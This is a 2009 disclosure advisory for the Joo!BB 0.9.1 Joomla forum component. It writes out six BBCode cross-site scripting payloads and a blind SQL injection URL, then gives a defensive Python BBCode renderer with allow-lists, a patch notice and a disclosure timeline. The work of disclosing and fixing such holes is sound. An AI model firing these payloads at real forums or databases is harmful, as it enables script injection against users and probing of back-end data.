Saturday, 01 August 2009 00:00

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1.
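The six BBCode findings share one root cause: tag arguments and tag bodies are copied into HTML attributes without validation, so nested tags, extra CSS and `javascript:` URLs survive. The renderer below is an added illustration of the fix such a parser needs; it is example code, not Joo!BB's code or its patch. It escapes the whole input before any tag is converted, accepts tag arguments only against strict allow-lists (http(s) URLs, hex or named colours, plain font names, and no argument at all on table tags), and then audits the rendered HTML the way a browser parser would see it. The sample payloads are constructed from the shapes listed above.

```python
import html
import re
from html.parser import HTMLParser

PAYLOADS = {  # constructed inputs modelled on the advisory's payload shapes, not the page's own text
    "nested_img": "[img]http://foo.com/fake.png [img] onerror=alert(1) [/img] [/img]",
    "nested_url": "[url]http://google.com?[url] onmousemove=alert(1);//[/url][/url]",
    "color_css": "[color=#ff0000;font-size:100px;]XSS[/color]",
    "url_scheme": "[url=javascript:alert(1)]http://google.com[/url]",
    "font_css": "[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]",
    "table_attrs": "[table=border='1'][tr][td=onclick='alert(1)']XSS[/td][/tr][/table]",
    "benign": "[color=red][url=http://example.org/a?b=1&c=2]link[/url][/color]",
}

# Allow-lists for tag arguments: the whole argument must match, otherwise the tag stays literal text.
URL_OK = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&*+,;=%()-]+")
COLOR_OK = re.compile(r"#[0-9A-Fa-f]{6}|[A-Za-z]{1,20}")
FONT_OK = re.compile(r"[A-Za-z0-9 ,-]{1,60}")

# (pattern, allow-list for group 1, HTML builder); table/tr/td take no argument, inner tags before outer.
RULES = [
    (r"\[img\](.*?)\[/img\]", URL_OK, lambda m: '<img src="%s" alt="">' % m.group(1)),
    (r"\[url\](.*?)\[/url\]", URL_OK, lambda m: '<a href="%s">%s</a>' % m.group(1, 1)),
    (r"\[url=([^\]]*)\](.*?)\[/url\]", URL_OK, lambda m: '<a href="%s">%s</a>' % m.group(1, 2)),
    (r"\[color=([^\]]*)\](.*?)\[/color\]", COLOR_OK, lambda m: '<span style="color:%s">%s</span>' % m.group(1, 2)),
    (r"\[font=([^\]]*)\](.*?)\[/font\]", FONT_OK, lambda m: '<span style="font-family:%s">%s</span>' % m.group(1, 2)),
] + [(r"\[%s\](.*?)\[/%s\]" % (t, t), None, lambda m, t=t: "<%s>%s</%s>" % (t, m.group(1), t))
     for t in ("td", "tr", "table")]

def render_bbcode(text):
    out = html.escape(text, quote=True)  # escape first, so raw < > " ' can never reach the browser
    for pattern, check, build in RULES:  # then convert only well-formed, allow-listed tags
        def repl(m, check=check, build=build):  # rejected argument: keep the escaped literal text
            return build(m) if check is None or check.fullmatch(m.group(1)) else m.group(0)
        out = re.sub(pattern, repl, out, flags=re.I | re.S)
    return out

class _AttrAudit(HTMLParser):  # records every (tag, attribute, value) a browser would receive
    def __init__(self):
        super().__init__()
        self.seen = []
    def handle_starttag(self, tag, attrs):
        self.seen += [(tag, k, v or "") for k, v in attrs]

def unexpected_attrs(rendered):  # attributes outside the allow-list or href/src not http(s); [] = clean
    allowed = {("a", "href"), ("img", "src"), ("img", "alt"), ("span", "style")}
    audit = _AttrAudit()
    audit.feed(rendered)
    return [s for s in audit.seen if s[:2] not in allowed
            or (s[1] in ("href", "src") and not s[2].startswith(("http://", "https://")))]
```

Running `render_bbcode` over each entry of `PAYLOADS` leaves the six attack shapes as visible literal text (no `<` is emitted for them) while the benign entry renders to a link inside a coloured span, and `unexpected_attrs` returns an empty list for all of them. Parameterised queries, not shown here, are the matching fix for the search injection in item 7.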

Timeline

  • Vulnerabilities Discovered: 26 July 2009
  • Vendor Notified: 27 July 2009
  • Vendor Response: 29 July 2009
  • Update Available: 01 August 2009
  • Disclosure: 01 August 2009
Last Updated on Thursday, 30 September 2010 17:39
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
